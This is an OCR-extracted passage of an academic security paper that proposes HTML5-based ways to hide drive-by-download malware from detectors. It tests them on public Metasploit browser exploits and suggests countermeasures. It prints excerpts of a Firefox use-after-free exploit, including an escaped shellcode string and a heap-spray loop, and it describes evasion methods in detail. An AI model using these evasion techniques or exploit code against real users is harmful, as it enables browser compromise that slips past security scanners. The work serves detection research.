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Abstract 

The web is experiencing an explosive growth in the last years. New 
technologies are introduced at a very fast-pace with the aim of narrowing 
the gap between web-based applications and traditional desktop appli¬ 
cations. The results are web applications that look and feel almost like 
desktop applications while retaining the advantages of being originated 
from the web. However, these advancements come at a price. The same 
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technologies used to build responsive, pleasant and fully-featured web ap¬ 
plications, can also be used to write web malware able to escape detection 
systems. In this article we present new obfuscation techniques, based 
on some of the features of the upcoming HTML5 standard, which can be 
used to deceive malware detection systems. The proposed techniques have 
been experimented on a reference set of obfuscated malware. Our results 
show that the malware rewritten using our obfuscation techniques go un¬ 
detected while being analyzed by a large number of detection systems. 
The same detection systems were able to correctly identify the same mal¬ 
ware in its original unobfuscated form. We also provide some hints about 
how the existing malware detection systems can be modihed in order to 
cope with these new techniques. 


1 Introduction 

The web is becoming the medium of choice for the development and the spread¬ 
ing of malware. Currently, it is estimated that approximately the eighty-five 
percent of all malware comes from the web (see [37]). One particular type of 
malware that is gaining success is the one implementing the drive-by-download 
attack (see [12]). In this attack, the unaware user downloads a web page from 
the Internet containing a malicious code, typically written in JavaScript. Once 
downloaded, the code starts acquiring information from the context where it 
is executed in order to determine which exploits can be used to gain access to 
some of the resources of the local machine. If a known vulnerability is found, 
the corresponding exploiting code is downloaded, deobfuscated and executed. 

The spreading of drive-by-download malware may be limited by using detection 
systems. These employ different techniques to determine if a web page contains 
a malware. Detection systems can be used either to prevent the spreading of 
malware, by establishing in advance which web sites host malware and, thus. 
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must be blacklisted or, during the ordinary browsing activity, to warn users 
about the potential danger of a page being browsed. State-of-the-art web mal¬ 
ware detection systems are based on the usage of honeyclients. These are client 
machines used to visit web pages that could contain malware. If the client gets 
in some way compromised after visiting a page, then the page is marked as 
containing a malware. This approach is very effective but also very expensive 
in terms of time and computational power. For this reason, it is used in con¬ 
junction with quick detection systems that are based on the static or semi-static 
analysis of a web page. These are used as fast filters to choose which pages could 
be harmful and, thus, should be analyzed by the honeyclients. The choice is 
carried out by classifying the behavior of web pages according to several features 
that are usually found in web malware. 

The explosive growth of malware is continuously fueled by the release of new 
technologies for the web. On a side, standardizing committees, web browser 
developers and large companies operating on the Internet are pushing for the 
adoption of technologies allowing the development of rich web-based client appli¬ 
cations. On the other side, the flourishing of these technologies is multiplying 
the possibilities of developing malware that are more effective and harder to 
detect than in the past. 

In this work, we show how to use some of the functionalities introduced with 
the upcoming HTML5 standard to rethink some of the obfuscation techniques 
used to deliver web malware on the browser of a victim machine. We also 
developed a reference implementation for the techniques we propose. These 
implementations have been tested, together with a selection of publicly available 
web malware, against several static and semi-static malware detection systems. 
The tests have been conducted in two stages. In the first stage, the malware 
samples have been analyzed by means of the chosen detection systems. In the 
second stage, the same malware has been reformulated using our techniques 
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and, then, analyzed again. The outcoming results show that, almost in all 
the analyzed cases, the considered web malware was correctly identihed by the 
detection systems in its original form, but it has gone undetected after being 
reformulated according to our techniques. The final aim of this article is to 
raise awareness about the potential dangers of some of the new functionalities 
related to the HTML5 standard thus fueling the development of more robust 
countermeasures. Some of these possible countermeasures are proposed along 
with the explanation of the obfuscation techniques. 

1.1 Organization of the Paper 

The remainder of the paper is organized as follows. In Section 2 we describe 
the anatomy of a typical drive-by download malware attack, with the help of 
a reference example. In Section 3 we briefly review the different approaches 
proposed so far in literature for the detection of malicious JavaScript code. In 
Section 4 we discuss several features introduced by the HTML5 standard and 
by several other related specihcations which are of interest for our work. In 
Section 5 we introduce and detail our obfuscation techniques. The description 
of each technique is accompanied by the discussion about the possible strategies 
to deploy for countering it. In Section 6 we present a prototype implementation 
for our techniques together with the results of an experimental analysis aimed 
at assessing their effectiveness when used in conjunction with several malware 
codes and malware detection systems. Finally, we list some concluding remarks 
in Section 7. 


2 Anatomy of the Drive-by Download Attacks 

Drive-by download attacks work by fooling a victim user in downloading a web 
page containing a malicious code (usually written in JavaScript). This code 
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leverages some vulnerabilities existing in the web browser of the victim in or¬ 
der to compromise the hosting machine. The exploitation is usually done by 
targeting one or more bugs existing in some components of the browser, such 
as installed add-ons or plug-ins. The final objective is the execution on the 
client machine of a shellcode (typically, a hex-encoded binary code) that gives 
the remote attacker access to the machine. As discussed in [8], these attacks 
usually follows a standard sequence of steps: 

1. Redirection and Cloaking. During this step, the victim may be sent 
through a long series of redirections, with the goal of making more dif¬ 
ficult to track the origin of the attack, up to reach the page where the 
real attack is initiated. Another activity carried out in this step is the 
acquisition of information about the execution environment (e.g., the IP 
address of the client machine, the operating system and the browser being 
used). This information is often transmitted to a remote server in order 
to determine if the browser running on the target machine, or one of its 
components, contains a vulnerability that can be leveraged to get access 
to the machine. If such a component is found, then a malware code ex¬ 
ploiting the corresponding vulnerability is sent back to the client. If no 
vulnerability is found or if the malware detects that is has been running 
on a honeyclient, no shellcode is downloaded to the client. 

2. Deobfuscation. The malware code usually comes as an obfuscated JavaScript 
program. This is done in order to hide the real purpose of a code and 
overcome signature-based analysis. The same may apply to the shellcode 
carried by the malware. When the attack has to take place, the obfuscated 
code is transformed in dear-text. 

3. Environment Preparation. Most part of the JavaScript-based attacks 
leverage on vulnerabilities found in some of the DLLs or of the plug-ins 


5 


commonly installed in a browser. During this phase, the malware prepares 
the code required to exploit these vulnerabilities and execute arbitrary 
code. 

4. Exploitation. This phase concerns with carrying out the attack. This 
typically involves the instantiation of the vulnerable software components 
and the injection of the harmful code. 

A typical example of JavaScript-based attack is the one presented in the list¬ 
ings 1, 2 and 3. The code has been generated by means of the mozilla_attribchildremoved 
module of the Metasploit Framework ([28]), which is publicly available on the 
web. The attack exploits an use-after-free vulnerability ([4, 10]) that affects 
some recent versions of the Firefox browser and which allows to execute arbi¬ 
trary code on a victim machine running Windows XP. Basically, the bug consists 
on the use of a previously dereferenced pointer (dangling pointer), which results 
in a memory error and, typically, in the application crash. The idea is that the 
memory previously occupied by the removed object can be carefully manipu¬ 
lated so that the buggy invocation results in a call to arbitrary code. 

It is worth noting that the sample malware presented in this section cannot 
be considered a fully-fledged drive-by-download, since it does not implement all 
the phases discussed in Section 2. For sake of simplicity, only the exploitation 
phase is considered hereinafter. However, without loss of generality, the tech¬ 
niques presented in this paper can be straightforwardly extended to real-word 
web-based malware, such as that implemented by the notorious exploit kits. 

The variables have been renamed and uppercased as well for sake of clarity. 

In the first phase, a malicious web server uses fingerprinting techniques in 
order to establish if the victim browser suffers from the vulnerability documented 
in [4] and in [10]. If so, a web page containing the malware is sent to the browser. 

In the second phase, the malicious code to be executed upon the attack is 
typically deobfuscated by leveraging the high dynamicity of JavaScript, which 
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allows to execute code assembled at runtime. In this case, the obfuscation 
technique used by the mozilla_attribchildremoved module simply consists 
of assigning random names to the variables used in the malicious code. In the 
sample code presented in this section the random variable names have been 
substituted with simplified uppercase names for the sake of clarity. No further 
modifications to the original code have been made. 

The third logical phase of the malware, related to the environment prepara¬ 
tion, consists of placing the payload in a predictable memory location, so that it 
can be called upon the exploitation. Listing 1 shows an excerpt of the payload 
used for this experiment, which contains a series of binary instructions, encoded 
as an UTF-8 string, aimed to simply executes the Calculator application un¬ 
der Windows XP. In this case, the malware employs the heap spray technique 
([7, 29]) in order to accomplish this task. The most relevant instructions of this 
function are presented in Listing 2. 

Finally, the malware can trigger the execution of the payload by exploiting 
the vulnerability which causes the arbitrary code execution. The code respon¬ 
sible for this task is shown in Listing 3. Basically, the removal of a child node 
from the tree representing the structure of the web page being shown allows, in 
some circumstances, for the child to still be accessible due to a premature no¬ 
tification. By manipulating the memory reserved to this element, it is possible 
to modify the program execution in order to launch the payload. 

3 Detecting Malicious JavaScript Code 

Several techniques have been proposed so far for detecting web malware. In 
the simplest approach, a database of malware patterns (signatures) is statically 
matched against an input JavaScript code. If a match is found, then the code 
is classified as a malware. This approach is typically implemented by antivirus 
software such as [38], [48], [2], as well as by intrusion detection systems such 
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Listing 1: Deobfuscation 


1 <script type =" text/javascript" > 

2 ... 

3 var PAYLOAD = unes cape ( " yoUc481 Zuf a24y,uf f f f y,ucbdby,u74d9y,uf 424y,ub85by, 

u73a4" + 

4 \Idots\Idots\Idots 

5 " yuSSbf you3d8dyoUd66e youa735you416e " ) ; 

6 ... 

7 </script> 


as [32]. 

Static detection can be easily overcome in many ways. One of the most used 
approaches relies on the dynamic features of the JavaScript language. Namely, 
the malware is brought to the victim machine in an encrypted or obfuscated form 
through a web page acting as an attack vector, as described in Section 2. The 
web page analyzes the environment where it is ran and sends the outcoming 
information back to a remote server. Then, it downloads the payload of the 
attack (i.e., the malware). Finally, the malware code is put in plain and executed 
using a dynamic code evaluation function, such as evalO. A static analysis 
through a signature-based detection system will completely miss the code run 
by the malware, as it is revealed only at runtime, thus making the correct 
detection of the malware by means of a static analysis much harder. 

A completely different and much more effective approach consists in runtime 
analysis, which can be further divided in off-line and on-line analysis. Off-line 
analysis is performed by means of a honeyclient, which is an instrumented envi¬ 
ronment aimed to analyze the effects produced by the execution of potentially 
malicious code. In high-interaction honeyclients (e.g., [16, 35]) the rendering of 
the web page is carried out in a sandbox, which is typically implemented as a 
virtual machine running a fully-featured browser. The surrounding environment 
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Listing 2: Environment Preparation 
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<script type="text/javascript"> 

var OFFSET = 1542; 

for (var i=0; i < 0x320; i++){ 

var PADDING = unescape(PADDING_STR); 

while (PADDING.length < 0x1000) PADDING+= PADDING; 

JUNK_0FFSET = PADDING.substring(0, OFFSET); 
var SINGLE_SPRAYBL0CK = JUNK_0FFSET + PAYLOAD; 
SINGLE.SPRAYBLOCK += PADDING.substring(0,0x800 - OFFSET - 
PAYLOAD.length); 

while (SINGLE_SPRAYBLOCK.length < 262144) SINGLE_SPRAYBLOCK += 
SINGLE.SPRAYBLOCK; 

SPRAYBLOCK = SINGLE_SPRAYBLOCK.substring(0. (262144-6)/2); 

VARNAME = "var" + RANDl.toString() + RAND2.toString(); 

VARNAME += RAND3.toString() + RAND4.toString() + i.toString () ; 
VARSTR = "var " + VARNAME + "= ’" + SPRAYBLOCK 
eval(VARSTR); 

} 

</script > 


is monitored in order to detect eventual attempts to compromise the system, 
which is typically accomplished by analyzing API calls, system calls, filesystem 
modifications, network activity and so on. 

A limitation of high-interaction honeyclients is that a malware can be de¬ 
tected only if the attack succeed, which may not happen. Malware may employ 
fingerprinting and cloaking techniques in order to adapt its behavior at runtime 
according to the environment where it runs. A web page could be harmful if 
open with a certain version of a certain type of browser using a certain type 
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of plugin, while being completely harmless if open in any other configurations. 
The malware could even be able to discern whether it runs inside a sandbox 
([20]) and completely evade the analysis as consequence. This implies the need 
of checking the same web page several times, using all the different combina¬ 
tions of browsers, operating systems, installed plugins and so on. This has the 
effect of dramatically increasing the computational time required to scan all 
the possible configurations as well as the overhead to be spent for keeping the 
system updated with all the possible testing configurations. This cost is further 
magnified by the release of new versions for the software products used in the 
browsing activity and by the discovery and disclosure of new vulnerabilities for 
these software. 

A similar approach is adopted by low-interaction honeyclients (e.g. [3, 31, 49, 
29, 11]). Rather than analyzing the effects on the system, the code flow produced 
by the web page is analyzed instead. It is typically accomplished by means of an 
emulated environment which enables to inspect instructions and data. Detection 
can be based on signature matching ([26]) or on more sophisticated anomaly 
detection procedures ([49]). Thanks to browser and environment emulation, 
low-interaction honeyclients have higher detection rates with respect to high- 
interaction honeyclients. Moreover, also preliminary phases of an attack (e.g., 
fingerprinting, deobfuscation, memory preparation, etc.) can be exposed. Off¬ 
line detection systems are typically fed by web crawlers and used to perform 
large-scale analyses. Malicious URLs can be added to a black list of malicious 
domains which may be used, for example, by browsers and search engines to 
warn users about the page they have been visiting. 

The analysis performed by means of a honeyclient may require a considerable 
amount of time. For this reason, the usage of honeyclients is often combined with 
other lighter detection techniques, like the ones presented in [23], [8], [6], [31]. 
The rationale of these techniques is to analyze, either statically or dynamically, 
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the content of a page and classify its behavior according to several features such 
as: the instantiation of very long strings, the usage of encrypting and decoding 
primitives, the allocation of software components that are known to be subject 
to exploits. This analysis occurs at a preliminary stage. If a page is found 
to be potentially harmful, it is sent to the honeyclient for a further analysis. 
Otherwise, the page is discarded. The advantage of this hybrid approach is 
that this preprocessing can be performed much faster than the honeyclient- 
base analysis, thus resorting to this technique only for pages that have a higher 
chance of being harmful. 

On-line analysis is more concerned about web client security, and can be 
employed in order to detect and prevent execution of web malware at runtime. 
It can be accomplished by means of in-browser ([18, 9]) or binary ([21]) instru¬ 
mentation. Since efficiency is one of the main aim of these systems, on-line 
analysis is typically based on a combination of dynamic and static approaches. 
Basically, function parameters are retrieved dynamically, while detection is per¬ 
formed by means of static classifiers (e.g. presence of certain patterns likely to 
be malicious). As for the case of high-interaction honeyclients, on-line analysis 
could be evaded by means of cloaking techniques. In [22] a system for detecting 
environment fingerprinting and cloaking attempts has been proposed, which can 
be used in conjunction with both on-line and off-line analysis. 

4 HTML5 and the Next Generation Web 

HTML5 is the arising standard for the next generation web. Although not 
being finished, the standard is already available as a draft (see [47, 50]) and 
is mostly implemented in all major browsers. It is currently being developed 
by both the World Wide Web (W3C) consortium and by the Web Hypertext 
Application Technology Working Group (WHATWG). The W3C is focused on 
the development of the standard specification while the WHATWG group pays 
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more attention to the way the specification is implemented by the web browsers 
and to the development of all the technologies that are related to this standard. 

In addition, the W3C consortium and the WHATWG group are also active 
in the development of several other specifications (see, e.g., [42, 44]) that in¬ 
tegrate the work done with the HTML5 main specifications. One of the goals 
of these specifications is to provide developers with the instruments required 
to code web applications that resemble and feel like standard desktop applica¬ 
tions, while retaining the advantages of the distributed computing. To this end, 
the specifications introduce several new features that allow to obtain richer and 
more responsive user interfaces, to cache and retrieve efficiently user’s data on 
a local machine, to have web applications seamlessly transfer data with their 
server counterparts with a small overhead, and to be able to mash together 
several services hosted by different providers and used by a same application. 
These features can be leveraged through several JavaScript-based programming 
APIs. 

In the following, we briefly describe some of the most noteworthy HTML5 
APIs. 

Local Storage API Allows to persistently store structured data, indexed 
by textual keys, in a storage area provided by the browser (see [44]). This 
mechanism is an evolution of the one implemented by the cookies. The access to 
the storage is restricted on a per-domain basis (i.e., only applications originated 
by the same domain that originated a storage area can access it) and is only 
possible from the client-side of a web application. 

Web SQL Storage API Allows to persistently store and query relational 
data using a database and the SQL language (see [41]). The access protection 
scheme is the same used in the Local Storage case. At the moment, there is not 
a standard specification of the SQL dialect to be supported by this technology. 
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Instead, all web browser implementors refer to the SQL dialect supported by 
SQLlite. This DBMS is also the one used by all browsers (except Firefox) for 
implementing this feature. 

IndexedDB API Allows to persistently maintain and query a collection of 
records containing either simple values or hierarchical objects (see [43]). Each 
record consists of a key and some values. Information can be retrieved either 
by using its key or by defining indexes on some of the fields of the stored data. 
Differently from the Web SQL Storage API, this API cannot rely on the ex¬ 
pressiveness and the flexibility of the SQL language while querying for data. 
Conversely, the key-value approach guarantees faster querying times and pre¬ 
vents from SQL injections attacks. 

File API Allows to persistently maintain and access information using a file- 
oriented interface (see [42]). Data can be of two types: File or Blob. The 
former is typically used to map access to objects that are stored as files in 
the file system underlying the browser. The latter is used to map access to 
immutable raw binary data, that are usually stored in memory and exchanged 
with a remote server. 

Web Workers API Implements a multi-threaded execution model within 
web applications. The application has the possibility to fork one or more 
threads. These are executed concurrently with their parent thread, using a 
different core/processor (if available). These threads run as long as their par¬ 
ent threads exist. Their execution occurs in a sandbox where most part of the 
APIs available to web applications cannot be used. The communication between 
threads is implemented by sharing some common data structures. These threads 
have been originally conceived as a mean for web applications to carry out CPU 
intensive tasks without affecting the response time of the user interface. 
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Canvas API Allows to draw and manipulate arbitrary graphics on a canvas 
surface (see [45]). The surface is encapsulated in a Canvas HTML element. The 
application can modify the content of a canvas pixel-by-pixel or use high level 
graphical primitives to draw lines, shapes, text, images. The content of a canvas 
can also be processed using image transformation operators or composition op¬ 
erators. Finally, arbitrary graphical animations can be easily implemented by 
programmatically updating the content of a canvas element through a periodical 
refresh. 

Cross-Origin Client Communication Allows two or more web applica¬ 
tions originated from different domains and running in different contexts (i.e., 
two iframes in a same page or two different pages) to communicate. The commu¬ 
nication is asynchronous and is based on the exchange of messages ([17]). The 
application willing to receive messages creates a new listener that is uniquely 
bound to the domain where it originated. The application interested in commu¬ 
nicating, creates a new message and sends it by providing the domain address 
where the target application should be listening. When receiving a new message, 
the target application may check (programmatically) the source of the message 
and decide if examine or discard it. 

WebSocket API Allows a web browser to maintain a TCP-based communi¬ 
cation channel with server-side processes (see [45]). Differently from traditional 
communication mechanisms based on the exchange of HTTP headers, this chan¬ 
nel allows for full-duplex transmissions. The content of a communication can 
be either data or text, and it can be initiated by any of the two parties of the 
communication. 
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5 Fooling Malware Detection Systems 

As discussed in Section 2, drive-by-download web malware are usually encrypted 
and/or obfuscated in order to escape signature-based detection systems. As a 
consequence of this, many static and semi-static detection systems look for 
the existence of programming patterns that look like decoding or deobfuscation 
routines in a JavaScript file, together with some other clues, in order to establish 
if it is likely to be a malware or not. 

In this article we propose three obfuscation techniques, based on some of the 
JavaScript-based APIs available with HTML5, to be used for delivering and/or 
assembling a malware in a web browser running on a target victim machine 
while fooling detection systems. 

All the techniques are based on the original drive-by-download malware 
schema: (1) as a preliminary phase, the original malware is obfuscated and 
stored server-side; (2) once the victim visits the malicious page, the malware is 
downloaded, reassembled and launched. 

The obfuscation phase (1) is common to all the techniques and can be sum¬ 
marized as follows. The malicious code is split in a series of chunks, each one 
containing a piece of the original code. The chunks are constructed ad-hoc in 
order to be individually undetectable (i.e. they resemble common strings). 

The delivery and the deobfuscation phases (2) leverage on HTML5 functions 
to avoid the typical (de)obfuscation patterns detectable upon a static or semi¬ 
static code analysis. The three techniques are: 

• Delegated Preparation. Delegate the preparation of a malware to the sys¬ 
tem APIs. 

• Distributed Preparation. Distribute the preparation code over several con¬ 
current and independent processes running within the browser. 

• User-driven Preparation. Let the user trigger the execution of the prepa- 
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ration code during the time he spends on a single page or a web site. 


5.1 Delegated Preparation 

Web malware makes massive use of strings. JavaScript provides many string 
manipulation functions that are particularly useful to embed shellcode in a web 
page and to implement (de)obfuscation routines. For this reason, detection sys¬ 
tems focus on study of strings and string-related functions. Detection rules are 
typically based on features like: occurrences of string manipulation functions like 
unescape 0 , decoding functions such as decode() and decodeURIComponent (), 
very long loops which are typically used for code deobfuscation, number of occur¬ 
rences of evalO or document. write () functions, which can be used to evaluate 
a string. 

The delegated preparation technique allows a web malware to avoid (at all 
or partially) the activities related to the decoding and/or the deobfuscation of 
a string by delegating these to the web browser internals, through the Web- 
SQL API or the IndexeDB API. As described in Section 4, these APIs allow 
to maintain and to query a database on the client side of a web application. 
The idea we propose is to split the malicious code into a series of chunks and to 
recompose it at runtime, as typically occurs for simple (de)obfuscation routines. 
The difference here is that each chunk is stored in a table entry on the local 
browser database. Then, when the attack has to take place, the retrieval and the 
preparation of the malicious code is delegated to the database engine through a 
properly crafted selection query. If a browser implementing the WebSQL API 
through the SQLlite software is used, the concatenation of the strings can be 
completely delegated to the SQL engine, by means of the GRDUP_CONCAT() op¬ 
erator. Otherwise, it would be up to the user-level code to browse the recordset 
returned by the query and concatenate the resulting strings. The resulting code 
can be finally executed by using the evalO function. An alternative approach 
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is based on the usage of the FileReader API. As described in Section 4, this 
API is meant to be used for dealing with data stored in the local storage of a 
browser by means of a hle-oriented approach. An additional, although less pop¬ 
ular, capability of this API concerns with the possibility of managing in-memory 
generic objects consisting of raw binary data: the Blob objects. These can hold 
an arbitrary number of array of bytes and are provided with a function that 
allow to convert their content into a single string of text. The aforementioned 
technique could be adapted by having a malicious code converted into a string 
of bytes and scattered into several very short arrays. These are sent to the client 
machine, where are stored as separate arrays in a single Blob object. Whenever 
the attack has to be triggered, the content of the Blob is converted into text, 
using the readAsTextO function available with the FileReader API. 

Comment The discussed techniques should prevent signature-based anti-malware 
systems from detecting malicious code during a static analysis, because the it is 
assembled dynamically. Moreover, they do not require to apply further encryp¬ 
tion nor obfuscation techniques, as the malicious code is implicitly obfuscated 
by the fragmentation schema used to break it into records. This allows to avoid 
all the operations that are usually needed to recover an encrypted/obfuscated 
code and that are used by detection systems as a hint to guess the presence of a 
threat. Instead, the malicious code is retrieved by using an application pattern 
that is apparently harmless and very common in practice. For example, it re¬ 
sembles the code to be written when preparing the text labels to be used when 
drawing a multi-language user interface. Finally, when the GR0UP_C0NCAT() 
function is available, the assembling of the original code string is triggered by 
one single line of user-level code, as it is completely delegated to the SQL storage 
engine. 
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Countermeasures A simple, although rough, way to counter the delegated 
preparation technique is to deny at all the possibility to run code that has been 
dynamically assembled using the output of a query to the local storage engine. 
In a similar way, it should be denied the possibility to run code assembled using 
the readAsText () operation of the FileReader API. However, this solution may 
be too limiting in a context where execution of dynamically assembled code is 
required. In such cases, a different strategy should be employed. 

Among the different approaches proposed in literature, one that seems to be 
promising for countering the delegated preparation technique is the one based 
on taint analysis (see [27, 19]). This is a particular type of data flow analysis 
that works by marking as tainted the data, in a program execution, that comes 
from a potentially-malicious source. Then, propagation of tainted values is 
traced along the execution of the program. Finally, is tainted values are used, 
as input, for the execution of a given set of, potentially-harmful, commands, a 
warning is produced. 

In our case, taint analysis could be applied by isolating all cases where a 
collection of strings is downloaded from the network, assembled into one string 
and, then, used as input for a dynamic evaluation function. In order to follow 
this strategy, taint analysis should be implemented with the possibility to keep 
track of tainted values, even if these are stored and retrieved from the local 
storage engine, as shown, e.g., in [39]. A possible way to reduce the number of 
false positives would be to employ string analysis techniques to mark as tainted 
only strings that are likely to contain assembly code. 

5.2 Distributed Preparation 

Typically, the operations driving the deobfuscation and the execution of a mal¬ 
ware would look harmless in themselves but harmful if considered as a whole. 
The distributed preparation technique aims at deceiving detection systems by 
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breaking-up the execution of a malware code in several simpler pieces to be 
executed separately in different contexts. Each piece of code would execute its 
part of the attack and, then, make available the result to the next part. 

From the technical point of view, this idea can be implemented by separat¬ 
ing the three activities of gathering the malicious code (in an encoded and/or 
obfuscated form), deobfuscating it and running it by executing them in dif¬ 
ferent threads through web workers (see Section 4). Communication between 
different workers could be established by using cross-origin client communica¬ 
tion primitives (see Section 4). Moreover, in order to further confuse detection 
systems, the communication patterns to follow during the execution of the at¬ 
tack would not be established statically but decided at runtime, by evaluating 
a function that would decide which other web worker would be the target of a 
communication at the end of a certain step. 

Comment The expectation is that this approach should be able to fool either 
static and semi-dynamic detection systems because these should not be able to 
recognize the activity performed by a single worker as part of a more complex 
distributed algorithm performed by all the involved workers. Firstly, the analysis 
of the code executed by a single web worker would not reveal any damaging 
activity. Secondly, it would be hard for a detection system to guess the correct 
order in which code is executed among different web workers without executing 
it. 

Countermeasures Countering an attack carried out using the distributed 
technique is likely to be harder than in the case of the delegated technique. Like 
in the previous case, a rough solution would be to deny at all the possibility 
to run a dynamic code assembled using data outcoming from an untrusted 
source (in this case, a message received from another worker). If this solution 
is not viable, it is possible again to resort to the taint analysis techniques for 
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detecting malicious code by tracing the usage of data coming from untrusted 
sources. However, the problem here is complicated by the distributed nature 
of the application being run. Several solutions have been proposed to this end 
in the recent literature, such as in [15, 36]. The rationale of these approaches 
is to introduce a framework able to generalize and aggregate the behavior of 
the single threads of a distributed application, so to be able to better trace the 
path followed for performing a malicious activity. These frameworks are able to 
trace both the activities of the single threads as well as to trace pieces of data 
exchanged among different threads. There remains, however, one important 
handicap. Since the communication patterns followed by the workers is not 
necessarily known a priori, but it may be influenced by the execution flow of 
the application, the taint analysis should be performed in a dynamic way (i.e., 
by monitoring the execution of the distributed application in a setting where the 
malicious activity takes place), thus leaving out static and semi-static detection 
systems. 

5.3 User-driven Preparation 

The user-driven technique is a variant of the distributed preparation technique. 
Here, the activities related to the preparation and to the execution of a malware 
are spread across the time that a victim user spends visiting a single page or a 
collection of pages (i.e., seconds or minutes) rather than being concentrated in 
few milliseconds. Moreover, in order to avoid the predictability of the sequence, 
the execution of the single activities is not automatic but it is triggered by the 
(unaware) user himself. Such an approach falls into the category of the Logic 
Bombs ([13]). 

From a technical point of view, this technique can be implemented by bind¬ 
ing the execution of malware activities to the occurrence of some user-triggered 
events (e.g., the user clicks on a button contained in the web page). A similar ap- 
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proach has been leveraged in the wild by the Nuclear Pack exploit kit (see [24]), 
whose malicious activity is triggered at the occurrence of a onmousemove event. 
The user-driven preparation technique is based on a more articulated idea. The 
content of the page is organized in such a way that the victim has to perform 
an exact sequence of steps in order to enjoy the content of the page (e.g., play¬ 
ing a game). By following this sequence, the victim unintentionally drives the 
execution of the malware. 

A possible refinement of this technique would require to scatter the malware- 
related activities across several web pages while using the browser local storage 
to save temporary data. 

Comment We expect this technique to be able to escape static and semi-static 
detection systems because the harmful code is scattered across several parts of 
the page and its execution is triggered by external non-deterministic events. 
Moreover, this technique could also be effective against detection systems based 
on honeyclients as the exact sequence of steps that cause an attack to take place 
is strongly related to the way a human user would interact with page. With 
respect to previous attempts of avoiding honeyclient analysis, such approach 
is much more effective since it would be very complicated for an automatic 
program to replicate the exact actions leading to the triggering of the attack. 

Countermeasures The user-driven technique falls in the more general cat¬ 
egory of trigger-based behaviors in malware, i.e., hidden behaviors in a code 
that are activated only when properly triggered. Similarly to what has been 
said for the previous techniques, the easiest (and more drastic) way to counter 
attacks based on the user-driven technique would be to deny the possibility to 
run code whose content has been influenced by the user’s input. When such a 
policy is not viable, it is possible to resort to some of the solutions existing in 
literature for this class of problems. Namely, detection systems such as the one 
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described in [5, 14] are able to detect, automatically or semi-automatically, the 
existence of a trigger-based behavior in a code, find the conditions that trig¬ 
ger such hidden behavior and, finally, find inputs that are able to trigger these 
conditions. The approach being used takes advantage from a mix of analysis 
techniques and may require a deep instrumentation or a reference execution of 
the code being analyzed. In our case, it is not clear if the time required by 
these systems for completing a scan over a malicious code that implements the 
user-driven technique would be feasible. 

6 Implementation and Experiments 

In the remaining part of this work we present the result of an experimentation 
aimed at assessing the effectiveness of the proposed techniques^ In these ex¬ 
periments we reproduced a series of real-world scenarios, where a victim client 
visits a malicious website which tries to execute one or more JavaScript-based 
malware. Such malware is obfuscated by means of the patterns discussed in 
Section 5. The experimentation consisted of the following steps: 

1. Selection of a reference set of JavaScript-based attacks publicly available 
on the web {base malware)] 

2. Analysis of the selected malware by means of a number of malware detection 
systems; 

3. Obfuscation of the attacks by means of the techniques presented in this 
work {obfuscated malware); 

4. Re-analysis of the obfuscated malware. 

copy of the code used in our experimentation is publicly available at the following URL: 
WWW.statistica.uniromal.it/users/uferraro/experim/malware. 
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Table 1: List of malware used in our experimentations 


Malware sample 

Target browser 

Vulnerability 

Public PoC exploit 

A 

Firefox 8,9 

CVE-2011-3659 

[30] 

B 

Internet Explorer 6 

CVE-2010-0249 

[34] 

C 

Firefox 3.5 

CVE-2009-2478 

[1] 

D 

Internet Explorer 6,7,8 

CVE-2010-3962 

[25] 


The objective of the experiments is to show that the web pages contain¬ 
ing the malware rewritten using our techniques result perfectly clean upon the 
re-analysis. The malware reference set includes some proof-of-concept attacks 
published on the web, some of which are summarized in Table 1. As already 
highlighted in Section 2, for sake of simplicity but without loss of generality, 
the sample malware used for the experiments is not real-word malware. In fact, 
it just implements the execution phase and is uses a proof-of-concept payload. 
All the sample code has been generated by means of publicly-available modules 
of the Metasploit framework, as summarized in Table 1. Some of the selected 
malware is intentionally dated, hence currently detected by most of (static and 
dynamic) malware detection tools selected at step 2. Clearly, the detection 
rate at the last step cannot increase if using novel attacks (i.e. 0-days) as base 
malware. All the malware samples have been configured to simply execute the 
Calculator program as result of the attack, but clearly the same results can be 
obtained by adopting more complex payloads. 

Despite lot of malware analysis techniques and tools have been proposed in 
literature (see Section 3) , a very limited subset of them is publicly available for 
use. The malware detection systems used to validate our methods have been 
Virus Total ([40]) and Wepawet ([49]). The first is a free online service that an¬ 
alyzes files and URLs for identification of various kinds of malware. VirusTotal 
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aggregates the output of different antivirus engines, website scanners and other 
file and URL analysis tools. This service allowed for fast testing with more then 
40 malware analyzers. VirusTotal uses not only state-of-the-art commercial an¬ 
tivirus engines, based on signature analysis, but also reputation-based engines, 
IPS engines, browser protection engines, buffer-overflow engines, behavioral en¬ 
gines and other heuristic engines^. Wepawet is a platform for dynamic off-line 
analysis of web-based threats which combines a number of approaches and tech¬ 
niques to analyze code executed by a web page. The core of the system is the 
JSAND module, which is one of the most advanced low-interaction honeyclients 
documented in literature. It is able to emulate several environment configu¬ 
rations in order to explore all the potentially harmful code paths. Dynamic 
analysis is implemented by means of anomaly detection techniques able to dis¬ 
cern between benign and malicious code execution. Since the implementation 
of these analysis tools is constantly evolving, it is important to highlight that 
all the experiments have been conducted between February and April 2013. 

6.1 Testing Environment 

The obfuscated malware samples have been embedded in a set of web pages 
and uploaded onto a local web server running Apache 2.2.16 on Linux Debian 
6.0. The server machine used for the experiments has been a laptop with an 
Intel Core i3-370M and 4 GB of RAM. The vulnerable client machine has been a 
laptop with Intel Pentium Processor P6100 and 2 GB of RAM, running Windows 
XP SP2 as operating system. 

The attacks used in the experimentation target different browser configura¬ 
tions under Windows XP, as summarized in Table 1. It is worth noting that 
some of these browsers, like Internet Explorer, do not provide support for the 

comperhensive list of the products used by VirusTotal can be found here: https: 
//www.virustotal.com/en/about/credits/ 
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HTML5 APIs employed by our techniques, which means that some the attacks 
cannot be really executed against the target environment. This should not 
be considered a weakness of the method, since detection based on static code 
analysis does not require the malware execution. On the other hand, browsers 
with HTML5 support, like Firefox 8 and 9, have been successfully exploited by 
means of the modified malware, which means that our obfuscation techniques 
are able to preserve the timeliness, the order and the correctness of all the low- 
level instructions required to accomplish the attack. The use of dated hardware 
for both the server and the client machines has been done to prove that no 
particular resources are required to execute our HTML5-based techniques. 

6.2 Experiment 1: Evasion Through Delegated Prepara¬ 
tion 

The delegated preparation technique assumes that portions of malware, referred 
to as malware chunks^ are stored on a malicious server and can be retrieved, for 
example, by means of the WebSocket protocol. A malware chunk may be a 
single instruction, a set of instructions, a piece of hex-encoded payload, a pre¬ 
computed value and so on. In the example presented below the malicious web 
page uses the HTML5 WebSocket API in order to establish a TCP connection 
